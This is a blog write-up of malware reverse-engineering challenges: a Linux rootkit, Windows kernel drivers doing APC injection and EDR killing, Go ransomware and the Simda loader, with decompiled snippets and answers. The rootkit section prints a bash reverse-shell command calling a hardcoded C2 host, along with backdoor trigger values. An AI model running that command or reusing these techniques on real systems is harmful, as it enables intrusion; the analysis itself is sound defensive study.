The publication date of this post reflects the initial version; I will probably split this up in the future.
The Malops platform is a collection of reverse engineering challenges targeting realistic malware scenarios. By providing a sample and a series of analysis questions, players are challenged to dive into real-world malware samples.
That’s exactly the right formula to get me hooked. To structure my progress while I make my way through the challenges and satisfy my inner completionist, I will be collecting write-ups below.
So far, the page below contains the following challenges (in order of completion):
This is a challenge in the rootkit category. We’re supplied with a file called singularity.ko; a Linux kernel driver. The challenge suggests to use IDA Pro, which means I’ll be using Binary Ninja.
“What is the SHA256 hash of the sample?”
We simply call sha256sum. The hash is 0b8ecdaccf492000f3143fa209481eb9db8c0a29da2b79ff5b7f6e84bb3ac7c8
“What is the name of the primary initialization function called when the module is loaded?”
Historically, the standard way was to implement init_module. More recent kernels define the module_init macro, which wraps a driver’s custom initialization function and defines it as an alias of init_module. The compiler appears to have flattened it back down to init_module.
“How many distinct feature-initialization functions are called within above mentioned function?”
The function looks as follows:
0x004052b0 int64_t init_module()
0x004052b0 endbr64
0x004052b4 call __fentry__
0x004052b9 push rbx {__saved_rbx}
0x004052ba call reset_tainted_init
0x004052bf mov ebx, eax
0x004052c1 call hiding_open_init
0x004052c6 or ebx, eax
0x004052c8 call become_root_init
0x004052cd or ebx, eax
0x004052cf call hiding_directory_init
0x004052d4 or ebx, eax
0x004052d6 call hiding_stat_init
0x004052db or ebx, eax
0x004052dd call hiding_tcp_init
0x004052e2 or ebx, eax
0x004052e4 call hooking_insmod_init
0x004052e9 or ebx, eax
0x004052eb call clear_taint_dmesg_init
0x004052f0 or ebx, eax
0x004052f2 call hooks_write_init
0x004052f7 or ebx, eax
0x004052f9 call hiding_chdir_init
0x004052fe or ebx, eax
0x00405300 call hiding_readlink_init
0x00405305 or ebx, eax
0x00405307 call bpf_hook_init
0x0040530c or ebx, eax
0x0040530e call hiding_icmp_init
0x00405313 or ebx, eax
0x00405315 call trace_pid_init
0x0040531a or ebx, eax
0x0040531c call module_hide_current
0x00405321 mov eax, ebx
0x00405323 pop rbx {__saved_rbx}
0x00405324 jmp __x86_return_thunk
We simply count the call operations, excluding the call to __fentry__; there are fifteen initialization functions.
“The reset_tainted_init function creates a kernel thread for anti-forensics. What is the hardcoded name of this thread?”
The reset_tainted_init function contains the following snippet:
0x004000aa void* rax_2 = kthread_create_on_node(
0x004000aa singularity_exit, 0, 0xffffffff,
0x004000aa "zer0t")
The last argument of kthread_create_on_node is the thread’s name, so the answer is zer0t
“The add_hidden_pid function has a hardcoded limit. What is the maximum number of PIDs the rootkit can hide?”
The following conditional in add_hidden_pid tells us when the loop breaks:
0x004027bc else if (hidden_count_1 != 0x20)
0x004027ca break
The limit is 0x20, which is 32 in decimal.
“What is the name of the function called last within init_module to hide the rootkit itself?”
Refer to question 2; it’s module_hide_current
“The TCP port hiding module is initialized. What is the hardcoded port number it is configured to hide (decimal)?”
We look at functions related to TCP for this. hiding_tcp_init installs a number of hooks, one of which is hooked_tcp4_seq_show. The latter contains the following conditional. For clarity, we set the type of v to struct sock*.
0x00400d7b if (v->__offset(0x318).d
0x00400d7b != in_aton("192.168.5.128")
0x00400d7b && v->__sk_common..skc_addrpair.d
0x00400d7b != in_aton("192.168.5.128")
0x00400d7b && v->__offset(0x31e).w != 0xa146
0x00400d7b && v->__sk_common..skc_portpair.w
0x00400d7b != 0xa146)
The port number is 0xa146, but it is important to note that skc_portpair.w is a word in little-endian representation. To compute the decimal, we must thus swap the bytes. We get 0x46a1, which is 18081.
“What is the hardcoded “magic word” string, checked for by the privilege escalation module?”
The “privilege escalation module appears to refer to become_root_init. This function installs a series of hooks starting from 0x0040aa10. Turning the data at that address into an array of ftrace_hook objects helps with readability somewhat.
We page through the installed hooks, and in hook_getuid we observe the following:
0x004002e2 if (strstr(i_1, "MAGIC=babyelephant") != 0)
0x004002e4 int64_t rax_5 = prepare_creds()
It appears the magic word is babyelephant.
“How many hooks, in total, does the become_root_init function install to enable privilege escalation?”
We see a singular call to fh_install_hooks. The second argument is the number of hooks: 0xa, or decimal 10.
“What is the hardcoded IPv4 address of the C2 server?”
See the snippet for question 7; 192.168.5.128. This IP also occurs in functions such as hooked_tpacket_rcv where the network traffic is hidden, and in hook_icmp_rcv and spawn_revshell where the actual connection is established.
“What is the hardcoded port number the C2 server listens on?”
It’s listening for a reverse shell connection by spawn_revshell; this function builds the following command string:
0x004048eb snprintf(&cmd, 0x300,
0x004048eb "bash -c 'PID=$$; kill -59 $PID; exec -a "%s" "
0x004048eb "/bin/bash &>/dev/tcp/%s/%s 0>&1' &",
0x004048eb "firefox-updater", "192.168.5.128", "443")
It establishes a TCP connection to 192.168.5.128 at port 443.
“What network protocol is hooked to listen for the backdoor trigger?”
That’s what’s happening in hook_icmp_rcv; the protocol we’re looking for is ICMP.
“What is the “magic” sequence number that triggers the reverse shell (decimal)?”
I’ve not dissected the packet structure in detail, but the following comparison seems to give it away:
0x00404ae5 if (head != neg.q(rax_6) &&
0x00404ae5 in4_pton("192.168.5.128", 0xffffffff, &trigger_ip, 0xffffffff, 0) != 0
0x00404ae5 && *(rax_3 + 0xc) == trigger_ip && *rdx_3 == 8
0x00404ae5 && *(rdx_3 + 6) == 0xcf07)
The magic number is 0xcf07. Again we interpret this as little-endian, converting to 0x07cf which is 1999 in decimal.
“When the trigger conditions are met, what is the name of the function queued to execute the reverse shell?”
Right below the condition from question 13, we find:
0x00404b3f if (rax_9 != 0)
0x00404b4f rax_9[3] = spawn_revshell
0x00404b5c int64_t rsi_2 = *system_wq
0x00404b63 *rax_9 = 0xfffffffe00000
0x00404b6a rax_9[1] = &rax_9[1]
0x00404b6e rax_9[2] = &rax_9[1]
0x00404b72 queue_work_on(0x2000, rsi_2)
The function is clearly named: spawn_revshell.
“The spawn_revshell function launches a process. What is the hardcoded process name it uses for the reverse shell?”
We refer to the command in question 11; the process name is supplied using the -a flag of the exec command: firefox-updater.
Continuing in the rootkit category, we’re given a single sample file. As we’ll see shortly, this is a Windows driver.
Binary Ninja correctly identifies this sample as something that runs on the windows-x86-kernel platform, but it appears support for this platform is not yet as complete as one might hope. In particular, the SEH prolog/epilog is not recognized correctly, and the type library is empty. We can manually select the windows-x86 platform instead, improving decompilation significantly. See also this Github issue.
“What is the SHA256 of this sample?”
Running sha256sum gives us 980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43
“What type of executable is this sample?”
This one had me stumped for a while. The answer format suggests we’re looking for six characters, so PE32 or PE is out. I tried native, but that was wrong.
After asking on the Malops Discord to verify whether the answer format was correct, I was told to look at the IMAGE_OPTIONAL_HEADER. Searching for a six character word let me to the DllCharacteristics flags — one of which is WDM_DRIVER. This indicates that the file is a Windows driver that uses the Windows Driver Model.
“This sample attempts to masquerade as a component of the system. Which system component is it attempting to masquerade as?”
The FileDescription field of the Version resource tells us that the file is the Windows NT SMB Manager. We can browse the file resources using tools such as Detect-It-Easy.
“What is the Original Filename of the sample?”
The OriginalFilename field is also part of a PE file’s Version resource. The original filename of this sample is mrxsmbmg.sys.
“This sample only runs on one type of system architecture, which one?”
This is a 32-bit driver and Windows provides no compatibility layer for drivers, so this sample only runs on 32-bit systems.
“This is targeted at specific versions of the Windows operating system. Which version of Windows will this sample not run on?”
In _start, we find the following snippet that retrieves and checks the system version:
0x00010d29 PsGetVersion(&var_8, &var_c, 0, 0)
0x00010d29 ...
0x00010d33 if (var_8 u<= 5)
The MajorVersion is written to var_8; the _start function only continues if it’s 5 or less. That’s remarkable, as the IMAGE_OPTIONAL_HEADER specifies a MajorOperatingSystemVersion requirement of 6.
“What Windows API does the sample use to execute the main function via Thread?”
After the OS check was passed and a memory pool was allocated, the _start function builds a Thread context and calls PsCreateSystemThread on line 0x10dd7. Notably, it passes a handle to sub_10afc as the StartRoutine argument.
“With the goal of obfuscating certain capabilities, the sample implements an algorithm for decrypting strings at runtime. What is the seed of this algorithm?”
In sub_10afc we find a couple references to sub_11524; the first argument is a constant, and the second is a reference to an address in the .data section. Looking at the chunks of data at those addresses, we identify several sequences of data separated by null bytes. Indeed, when we check the cross references to the start of these sequences, we find more references to sub_11524. Presumably this is the string deobfuscation routine.
Inside sub_11524, we find some buffer manipulation and a reference to sub_11432. This is where the magic happens:
0x00011456 if (result s> 0)
0x00011475 do
0x0001145e state = state * 0x19660d + 0x3c6ef35f
0x0001146e buffer[ecx_1] ^= (state u>> 0x10).w | 0x8000
0x00011472 ecx_1 += 1
0x00011475 while (ecx_1 s< result)
That’s an LCG! Tracing the function arguments, we see that the first argument of sub_11524 is passed to sub_11432 as its first argument as well. This is the LCG seed; 0xaa107fb.
Interestingly, there are two instances of data deobfuscation going on. The function described above operates on words, while the LCG at sub_11432 operates on bytes. Indeed, the encrypted strings from 0x12f20 onwards are separated by singular null bytes rather than null-words.
“What are the first three strings (in order) that were decrypted?”
Alas, a question where dynamic analysis is probably much more convenient. That requires firing up a Windows VM, though. We can use the Binary Ninja API and a bit of Python, instead:
def decrypt_string(addr):
state = 0xAA107FB
output = ""
while True:
data = int.from_bytes(bv.read(addr, 2), byteorder="little")
addr += 2
if data == 0:
break
state = (state * 0x19660D + 0x3C6EF35F) & 0xFFFFFFFF
output += chr(data ^ ((state >> 0x10) | 0x8000))
return output
print(decrypt_string(0x12eb0))
print(decrypt_string(0x12e9c))
print(decrypt_string(0x12ecc))
The fact that it operates on words tripped me up when implementing the above, and I ended up using unicorn with udbserver and gdbgui to trace what was going on. At that point the debugger showed the strings, but I was already too far down the static analysis rabbit hole to accept defeat.
We can use the Binary Ninja API as follows to quickly rename the strings accordingly; the first three strings are services.exe, lsass.exe and winlogon.exe.
bv.define_user_data_var(here, bv.get_data_var_at(here).type, decrypt_string(here))
Purely out of curiosity, the other strings in the .data section encrypted using the 2-byte LCG are msvcp73.dll and Kernel32.dll. The single-byte LCG was used to encrypt the names of memory allocation and thread related API calls: VirtualFree, LoadLibraryW, KeAttachProcess, KeDetachProcess, ZwAllocateVirtualMemory, ZwFreeVirtualMemory, KeInitializeApc, and KeInsertQueueApc.
“This sample implements a process injection routine. What is the name of the injection technique implemented by this sample?”
It should not come as a surprise that the decrypted process names we found in question 9 are targets for process injection.
The loop in sub_10afc iterates over the candidate processes. In sub_10a40 and sub_11fba, the ZwQuerySystemInformation API is used to retrieve SystemProcessInformation and iterate over all available processes to see whether the candidate process is present. When it is present, the actual injection is attempted in sub_1116e.
The strings we noted in question 9 are decrypted here;
0x000111b3 int32_t eax = sub_11582(0xaa107fb, &KeAttachProcess)
0x000111c1 int32_t eax_1 = sub_11582(0xaa107fb, &KeDetachProcess)
0x000111cf int32_t eax_2 = sub_11582(0xaa107fb, &ZwAllocateVirtualMemory)
0x000111dd int32_t eax_3 = sub_11582(0xaa107fb, &ZwFreeVirtualMemory)
Without diving into sub_11582, let’s assume it decrypts and resolves the listed API functions; the returned pointers are used directly in call instructions (e.g., on line 0x113e2). For clarify, we mark sub_113bd as an inline function so that Binary Ninja is able to follow the pointers that were stored on the stack.
After the calls to KeAttachProcess and ZwAllocateVirtualMemory, we see a call to ExAllocatePool that allocates a block of memory, which is then passed to sub_10fbc. Skipping ahead, we see that the buffer is then copied to the remotely allocated memory. Let’s jump into sub_10fbc!
In sub_10fbc, the first thing we notice is the decrypted strings Kernel32.dll, VirtualFree and LoadLibraryW. The Kernel32 string is passed to sub_10df0, where ZwQueryInformationProcess is called with ProcessInformationClass 0 which retrieves the PEB structure. The remainder of the function iterates through the PEB to retrieve an instance of Kernel32.dll. Setting the variable assigned on line 0x10e8f to the PEB_LDR_DATA* type helps make the code a bit more readable. When Kernel32.dll is found, the respective LDR_DATA_TABLE_ENTRY is assigned to the output pointer in the second function argument:
0x00010ec9 while (true)
0x00010ed1 if (RtlCompareUnicodeString(&Flink->BaseDllName, &var_38, 1) == 0)
0x00010ed6 *arg2 = Flink
0x00010ede _local_unwind2(&ExceptionList, 0xffffffff)
0x00010ee5 result = 0
0x00010ee7 break
0x00010eec Flink = Flink->InLoadOrderLinks.Flink
Next up is sub_1174e. Binary Ninja does not quite recognize that it receives a bunch of arguments, and instead creates stack variables. It does now see that DllBase is passed, at least.
0x000110c0 RtlInitString(&var_3c, LoadLibraryW)
0x000110c5 int32_t var_34
0x000110c5 int32_t* var_4c_4 = &var_34
0x000110c6 int32_t var_50_7 = 0
0x000110ca void* var_54_2 = &var_3c
0x000110cb int32_t var_58_2 = 1
0x000110d5 result_2 = sub_1174e(DDL_base: result_4->DllBase)
By defining the function type to accept five arguments, we get the following:
0x000110c0 RtlInitString(dest: &var_3c, src: LoadLibraryW)
0x000110d5 int32_t var_34
0x000110d5 result_1 = sub_1174e(DDL_base: kernel32_1->DllBase, 1, &var_3c, 0, &var_34)
From context we can assume that it’s looking for VirtualFree and LoadLibraryW inside Kernel32.dll. When found, it writes the result to specific addresses within the buffer that was passed to sub_10fbc. But it appears we’re digressing a bit..
0x000110e8 memset(&pool[2], 0, 0x100)
0x000110f6 wcsncpy(&pool[2], arg2, 0xff)
0x00011102 *pool = virtualFree
0x00011107 pool[0x83] = loadLibraryW
After sub_10fbc has filled in the blanks and the code is set up, we jump into sub_11cca. I suppose this is where I should’ve immediately looked at where the other decrypted strings were used; on address 0x11cf2 and 11cff the API calls to KeInitializeApc and KeInsertQueueApc are resolved. This starts to look like APC injection..
Indeed, the remainder of the function uses KeInitializeApc sets up an APC context and inserts it into the queue. The third argument to sub_11cca is the target thread. Tracing the input we can see it was set up in sub_11b78, but I’ll leave that for another time.
“What are the two APIs used by this sample to execute the injection technique?”
We’ve covered this in the previous question: KeInitializeApc and KeInsertQueueApc.
“A shellcode will be injected using the technique identified in the previous question. This shellcode will load a module into the injected memory. What is the name of this module?”
We make note of another decrypted string: msvcp73.dll. We can find references to it in sub_104b4, where it’s decrypted and returned. We can then trace it as an argument to sub_1116e and into sub_10fbc, which we pulled apart for question 10. In particular, on line 0x110f6, the msvcp73.dll string is copied into the shellcode using wcsncpy.
It seems we get to stay in the kernel a bit longer. This challenge presents us with a kernel driver that sabotages EDR so that ransomware can do its thing. It is described to communicate over IOCTL. Reading this blogpost on communication between usermode and kernel drivers proved to be quite useful.
This time around we’re dealing a 64-bit kernel driver, and the Binary Ninja platform windows-kernel-x86_64 is much more mature.
“The driver exposes itself to usermode applications under a specific name. What is this name?”
The only relevant outgoing function from DriverEntry (labeled _start) is sub_14000114c. We immediately note \Device\NSecKrnl and \DosDevice\NSecKrnl. Tracing these throughout the function, we see them being used as an input to IoCreateDevice and IoCreateSymbolicLink as the DeviceName and SymbolicLinkName.
The length of the answer format suggests that the answer we’re looking for is NSecKrnl.
“During initialization, the driver tampers with its own loader entry to bypass a kernel security check. What hex value is OR’d into that field?”
Right at the start of the function, we observe the following:
140001152 void* DriverSection = arg1->DriverSection
140001165 *(DriverSection + 0x68) |= 0x20
That must be what’s referred to here, so the answer is 0x20. The exact structure of the DriverSection is out of scope for this challenge.
“At what byte offset from the base of the loader data table entry does this tampering occur?”
That’s the offset we saw in Question 2: 0x68.
“One of the IOCTL codes handled by the dispatch function leads to forced process termination. What is this code in hex?”
Now we get to dive into the function that handles IOCTL codes; that’s MajorFunction 14, IRP_MJ_DEVICE_CONTROL, identified as sub_140001030.
By clicking through the subroutines of the dispatch function, we find sub_1400013e8 which includes a call to ZwTerminateProcess. This function is gated behind IOCTL code 0x2248e0.
“When the dispatch function receives an unrecognized IOCTL or a NULL input buffer, it returns a specific NTSTATUS code. What is it in hex?”
If none of the conditional branches are met, the status is left to the default value of 0xc0000001.
“The driver maintains internal tracking arrays with a fixed capacity. How many entries can each array hold?”
An array is used in sub_140001614 in a loop that iterates until the index is 1024. In sub_140001240 we also see an array, and while the loop counter does not reveal its size, we note that the memory layout suggests it can also contain 1024 64-bit integers.
“The driver registers a kernel callback to intercept handle operations at a specific altitude. What is this altitude number?”
The altitude of a file system driver dictates where it is placed in the order of execution between the application layer and the file system.
All of this happens in sub_140001518, which, coming out of decompilation is a bit of a mess. Proper struct typing is crucial; using the OB_CALLBACK_REGISTRATION type for the variable at stack offset -0x38 and OB_OPERATION_REGISTRATION for the variable at offset -0x58, we get the following:
140001533 OB_OPERATION_REGISTRATION op_reg
140001533 op_reg.ObjectType = PsProcessType
14000153e op_reg.Operations.q = 3
14000154f op_reg.PreOperation = sub_1400014b0
140001555 OB_CALLBACK_REGISTRATION callback_reg
140001555 callback_reg.Version = 0
140001555 callback_reg.OperationRegistrationCount = 0
140001555 callback_reg.Altitude.Length = 0
140001555 callback_reg.Altitude.MaximumLength = 0
140001559 callback_reg.OperationRegistration = 0
14000155d op_reg.PostOperation = 0
140001561 callback_reg.Altitude.Buffer = 0
140001561 callback_reg.RegistrationContext = 0
140001565 callback_reg.Version = 0x100
140001565 callback_reg.OperationRegistrationCount = 1
14000156c RtlInitUnicodeString(DestinationString: &callback_reg.Altitude, SourceString: u"328987")
140001576 callback_reg.RegistrationContext = 0
140001581 callback_reg.OperationRegistration = &op_reg
140001589 NTSTATUS result = ObRegisterCallbacks(CallbackRegistration: &callback_reg,
140001589 RegistrationHandle: &callback_registration_handle)
We could have suspected as much based on the string value, but now it is abundantly clear that the altitude is 328987.
“When the driver opens a handle to a process it is about to forcefully terminate, what handleattribute value (hex) does it request?”
This happens in the function we identified in question 4, sub_1400013e8. The value is 0x200.
“What is the PDB filename embedded in the binary?”
This one’s for DiE. We find the path D:\NSecsoft\NSec\NSEC-Client-Kernel\Drivers\NSecKrnl\NSecKrnl\bin\NSecKrnl64.pdb
“The driver creates its device object with a specific device type constant. What is this value in hex?”
We find this as an argument to IoCreateDevice;
1400011d8 NTSTATUS result = IoCreateDevice(DriverObject: arg1, DeviceExtensionSize: 0,
1400011d8 DeviceName: &devicename, DeviceType: 0x22, DeviceCharacteristics: 0,
1400011d8 Exclusive: 0, &DeviceObject)
“All four IOCTL codes are evenly spaced. What is the stride (difference) between consecutive codes?”
The codes are 0x2248d4, 0x2248d8, 0x2248dc and 0x2248e0, so they’re 4 apart.
“Before the handle interception callback checks its internal tables, it performs a self-check to avoid interfering when a process operates on itself. What kernel API provides the current process pointer for this comparison?”
This happens in the PreOperation callback we identified in question 7. It’s useful to type it accordingly (POB_PRE_OPERATION_CALLBACK), so that the arguments are resolved properly. We quickly see a call to IoGetCurrentProcess().
“After unregistering the handle interception callback during driver teardown, the registration handle global is set to a specific value. What is it?”
This happens in sub_140001674; the global is set to 0.
“The handle interception monitors two types of operations simultaneously. What is the combined flag value (decimal) in the operation registration structure?”
That’s the OB_OPERATION_REGISTRATION object, where we see an Operations value of 3. That’s the sum of OB_OPERATION_HANDLE_CREATE and OB_OPERATION_HANDLE_DUPLICATE.
“The termination function must release a reference on the process object before returning. What kernel API performs this dereferencing?”
There is no room for ambiguity here: that’s ObfDereferenceObject.
“During initialization, the driver registers a notification callback for image loading events. The function registered for this purpose is unusually small. What is its size in bytes (hex)?”
The routine only contains a return operation, c2 00 00.
“The address of the function that the driver assigns as its DriverUnload handler is what?”
That’s sub_1400010e0.
This challenge concerns a ransomware sample written in Go. Binary Ninja seems to have some trouble; the support for Go’s calling conventions just isn’t quite there yet, and even with GoReSym output there’s still quite some work to do.
Luckily, IDA Free is able to handle this sample much better, so I’ll use IDA for this challenge. Note that I’ve generally left the function names the way IDA presents them, i.e., I did not replace the _ placeholders by Go’s / and . separators.
“Which version of the Go compiler was used to build this binary?”
DetectItEasy tells us it’s go1.24.5.
“What is the Relative Virtual Address (RVA) of the program’s main function?”
We find main_main at 0xDAE980.
“In the isRunningAsAdmin function, which Windows API is the first to be resolved via the HCWin/apihash package?”
We simply open up the function and see a call to HCWin_apihash__ptr_APIHash_GetCurrentProcess. Internally, this function calls the generic function HCWin_apihash__ptr_APIHash_CallAPI and passes GetCurrentProcess as a parameter.
“The binary calls GetTokenInformation. What specific token class (by name) is being requested to verify privileges?”
The call to GetTokenInformation also happens in isRunningAsAdmin; we find this by looking up cross-references to the GetTokenInformation function.
The function signature of GetTokenInformation is as follows:
BOOL GetTokenInformation(
[in] HANDLE TokenHandle,
[in] TOKEN_INFORMATION_CLASS TokenInformationClass,
[out, optional] LPVOID TokenInformation,
[in] DWORD TokenInformationLength,
[out] PDWORD ReturnLength
);
Looking at the second argument, we see that the constant value 20 is passed. If we set the type of that argument to TOKEN_INFORMATION_CLASS, IDA resolves it to TokenElevation.
“Which package is responsible for configuring and executing the evasion of Event Tracing for Windows?”
Simply scrolling through main_main, we see several references to HCWin_etwevasion. Surely that must be it. A bit further down, we see alternative code paths that raise related error messages (“ETW evasion initialization failed”).
“If the malware fails to retrieve the computer name via the Windows API, which environment variable does it read as a fallback to generate the system seed?”
Looking for references to common Windows APIs to get the computer name, we identify internal_syscall_windows_GetComputerNameEx, which is called from Go’s os/hostname. That seems to be a dead end, though, as we find no references to os/hostname.
Instead we start top-down from main again. We do not immediately see any relevant calls directly from main_main, but the package does contain a getSystemSeed function. Upon closer inspection it is called indirectly via generateMutexName.
In getSystemSeed we see dynamic API resolution of GetComputerNameW, so we’re on the right track. In the alternative codepath, when syscall__ptr_LazyProc_Call(GetComputerNameW, ..) fails, we see a call to os_Getenv(USERNAME).
“The function getSystemSeed dynamically loads a DLL to access GetComputerNameW. What is the name of this DLL?”
Just above the call to LazyDLL/NewProc that loads GetComputerNameW, we see a call to syscall_NewLazyDLL("kernel32.dll", 12). That makes sense, as that’s where GetComputerNameW is typically found.
“The malware prepends a specific string to the generated Mutex name to ensure the synchronization object is visible across all user sessions. What is this prefix?”
We hop a function up in the call tree and look at generateMutexName. The function ends with a call to runtime_concatstring2, to which it passes a reference to data at address 0xE4CF36 and specifies a substring length of 7. If we look at the raw characters at this address, we find Global\.
“Which specific Windows error code does the checkSingleInstance function check to see if the Mutex already exists?”
IDA has some trouble following the stack variables in checkSingleInstance, but the comparison at 0xDADD65 is pretty clear: cmp rbx, 0B7h.
Looking at Windows system error codes, this corresponds to ERROR_ALREADY_EXISTS; “Cannot create a file when that file already exists.”
“The Hook Shield module starts a monitoring routine to check for hooks periodically. What is the time interval (in milliseconds) defined in this check?”
Looking through calls from main that relate to the Hook Shield module, we see HCWin_hookshield__ptr_HookDetector_StartMonitoring. In addition to the ‘detector’ object, it is passed the constant value 500000000. Clicking through the call stack we arrive at HCWin_hookshield__ptr_HookDetector_monitoringLoop, in which a new time/newTicker object is created. The Go documentation specifies that it takes a duration value in nanoseconds, so that’s 500 milliseconds.
“To prevent victims from restoring files, the malware executes a specific function to remove Windows Volume Shadow Copies. What is the name of this function?”
Back in main, we see a call to HCWin_shadow_DeleteShadowCopies. Sometimes it is that straight-forward.
“How many distinct services or processes is the malware configured to terminate (kill)?”
By searching for the keywords “terminate” and “kill”, we find a function called killBlacklistedServices. It starts with a loop that iterates over values found via the pointer at address 0x10606E0 (which points to 0x1066D00) to create main/killFlags objects. The iterator starts at the value found at 0x10606E8, where we see the value 0x1F (decimal 31). Indeed, there are 31 process names at 0x10606E0.
“What is the memory address of the string data for the first service in the kill list?”
We find the reference at address 0x1066D00, pointing to 0xE4C09A where we find the string sql.
“The malware uses multiple methods to propagate to other systems. According to the string at 0xe4c09d, what is the first protocol it attempts to use for remote execution?”
At 0xe4c09d we find the string WMI, which matches the description perfectly.
“To identify vulnerable file shares for lateral movement, the malware checks for a specific open port number. What is this port?”
Surely this will be the SMB port 445, or perhaps 139.
We’re looking for functions related to network shares; searching for share presents us with a bunch of functions in the HCWin/shares namespace, and we spot isSMBPortOpen. Indeed, this checks port 445, and we can trace a path from main_encryptNetworkShares to this function.
“The malware contains a hardcoded list of files to skip to ensure the OS remains bootable. Which hidden system directory related to deleted files is explicitly excluded?”
We identify main_findFiles as the function responsible for walking the file system. Inside, it calls path_filepath_Walkdir and supplies main_FindFiles_func1 as the function to execute for every directory.
main_FindFiles_func1 is a bit of a mess, but we find a reference to a list of file names that starts with $recycle.bin. It appears there are 0x17 entries in the list; the next one is $windows.~bt.
“To avoid encrypting its own instructions, the malware excludes a specific filename from the encryption list. What is the name of this note file?”
That’s in the same function, but not in the same list: R3ADME_1Vks5fYe.txt.
“The malware uses a checksum algorithm to identify files it has already encrypted. What is the expected total length (including the dot) of the extension validated in ‘isValidExtension’?”
Right at the top of isValidExtension, argument 2 is compared to 9 and the first character of argument 1 is checked not to be a dot. The rest of the function assumes length 9, so the length is not actually used.
“The malware generates a random symmetric key for each file. Based on the buffer size passed to crypto/rand.Read, what is the bit length of this key?”
We can cross-reference from crypto_rand_Read, and see that it’s called from main_encryptFile twice; once to get 32 bytes of data, and once to get 12 bytes. Without diving into the crypto, this smells very much like the IETF’s variant of ChaCha20, with a 32-byte key and a 12-byte nonce. That means we’re looking at a 256-bit key.
“To secure the per-file symmetric keys, the malware encrypts them using a public key algorithm. Which specific padding scheme is used with RSA?”
A bit further down, after loading the RSA key, we see a call to crypto_rsa_EncryptOAEP. Thus the padding scheme used here is OAEP.
“The malware creates a header for encrypted files. What 4-byte ASCII string (Magic Marker) is written at the very end of the file header?”
Scrolling through the EncryptFile function, we make note of a remarkable constant (uint8 *) RDPSSDNE. Further down, we observe that a pointer halfway into the buffer is passed to bytes__ptr_Buffer_Write, writing four bytes. In little-endian order, we would write ENDS. That matches the description too well to be a coincidence.
“For large files, the malware does not encrypt the entire content to save time. What single character does it write to the file footer to indicate this mode?”
It would appear this relates to main_generatePartialEncryptionOffsets, which seems to return a pointer if partial encryption is necessary. The subsequent branch reveals that the character P is relevant when we’re partially encrypting..
PartialEncryptionOffsets = (_QWORD *)main_generatePartialEncryptionOffsets(v238, (__int64)v99, 32, 32);
if ( PartialEncryptionOffsets )
v101 = *PartialEncryptionOffsets;
else
v101 = 0;
if ( v101 )
{
v104 = PartialEncryptionOffsets;
v87 = 'P';
}
A bit further down, a debug message describes a case where it’s falling back to ‘full encryption’, and in that case v87 is set to C. This further strengthens our hypothesis that v87 is the distinctive character. Tracing it through the function, we observe it being written to the buffer using bytes__ptr_Buffer_WriteByte.
“The malware uses a specific Windows API function from user32.dll to apply the new wallpaper. What is the name of this function?”
Changing gears again, we search for a function related to a wallpaper and find main_changeWallpaper. It contains a single API call to SystemParametersInfoW.
if ( HCWin_apihash__ptr_APIHash_CallAPI("SystemParametersInfoW", 21, v2, 10, &v9) )
“The malware uses above mentioned API to change the desktop wallpaper. What specific SPI constant (by name) is passed as the ‘uiAction’ argument to trigger this behavior?”
The function signature is as follows:
BOOL SystemParametersInfoW(
[in] UINT uiAction,
[in] UINT uiParam,
[in, out] PVOID pvParam,
[in] UINT fWinIni
);
Because of the indirection through HCWin_apihash__ptr_APIHash_CallAPI, we’ll need to look into v9 for the arguments. We see that it’s set to 0x14, and looking at the Microsoft documentation, we find that this corresponds to SPI_SETDESKWALLPAPER.
“In the fallback self-destruct mechanism, the malware drops a VBScript to disk. Which Windows executable is explicitly invoked to run this script silently?”
We’re looking at main_selfDestruct for this. It contains three routines in a cascading if-else-construction. As we’re looking for the ‘fallback’, we’ll start at the final routine: main_deleteSelfViaWMI. Indeed, we immediately spot cleanup.vbs, which is passed as a parameter to a fmt/Sprintf call that constructs a wscript.exe command.
Simda is a sample in the botnet category, but the description suggests it is a loader. We’ll have a look where this takes us.
Before we start answering the research questions, we note that the _start function does not decompile nicely in Binary Ninja. IDA seems to handle it a bit better; there are some push-ret-trampolines that seem to break the control flow analysis. Consider the following snippet:
00401394 689a134000 push sub_40139a {__return_addr}
00401399 c3 retn {__return_addr}
{ Continuation of function sub_40139a }
00401394 689a134000 push sub_40139a {var_4}
00401399 c3 retn {var_4} {sub_40139a} {sub_40139a}
0040139a int32_t sub_40139a()
0040139a 68a0134000 push data_4013a0 {var_4}
0040139f c3 retn {var_4} {data_4013a0} {data_4013a0}
004013a0 68a6134000 push 0x4013a6 {var_4}
004013a5 c3 retn {var_4} {0x4013a6} {0x4013a6}
004013a6 a188a04c00 mov eax, dword [data_4ca088]
Each combination of push and return simply jumps to the next instruction. This means we can replace all of them by NOP instructions. This improves the decompilation, as Binary Ninja is now able to recognize that sub_40139a was not really a function but simply the tail of _start.
With that out of the way, let’s dig in.
“What is the first windows API used by the malware to allocate memory?”
Clicking through the functions called from _start, we see a call to GetProcAddress and LoadLibrary to load VirtualAllocEx in sub_4016b0.
“What does the second parameter given to RegOpenKeyA call point to?”
That’s the subkey parameter, pointing to the string clsid\{d66d6f99-cdaa-11d0-b822-00c04fc9b31f}. Apparently that’s the CLSID Multi Language ConvertCharset.
“The malware dynamically resolves Windows API function names in memory, and decrypts a large blob of data, which function is responsible for grabbing the encrypted blobs? Provide address in hex”
The _start function appears to build up a data structure with pointers into the executable in sub_4014f0. Then, after memory has been allocated, we see a loop that walks through the buffer in chunks of 0x44 bytes and calls sub_4011b0 to move the data from the raw executable to the buffer. Remark that it skips 0x1f bytes between each 0x44 byte chunk; these 0x1f bytes do not count towards the buffer size.
“The malware uses a dynamic key for decryption, What is the initial decryption key used to decrypt the encrypted blobs (word size)?”
After the loop, sub_401000 performs the decryption. Internally, we see a call to sub_401650 where the actual XOR operation happens. Both functions appear to contain some seemingly meaningless instructions – perhaps to obfuscate their behavior. The decryption is simple: the ciphertext is XOR’ed with the value passed as the second argument: i + 0xb0b6. The value of i starts off at 0, and is incremented by 4 on each loop.
It’s remarkable that the decryption starts off with a 16-bit key, while all of the arithmetic is 32-bit. This means that the top half of each 32-bit value is not touched. From sub_4014f0 we learn that the encrypted data is stored at 0x401714, and indeed we can make out some readable fragments every two bytes; surely, Vi..ua..re starts with Virtual.
00000000: 00 70 08 00 f1 d5 74 50 c4 df 63 41 d2 d4 72 65 .p....tP..cA..re
00000010: a5 c3 00 00 b6 e6 69 72 aa c5 61 6c 77 dc 6c 6f ......ir..alw.lo
00000020: 95 b0 00 00 b6 b0 56 69 84 c4 75 61 8a f6 72 65 ......Vi..ua..re
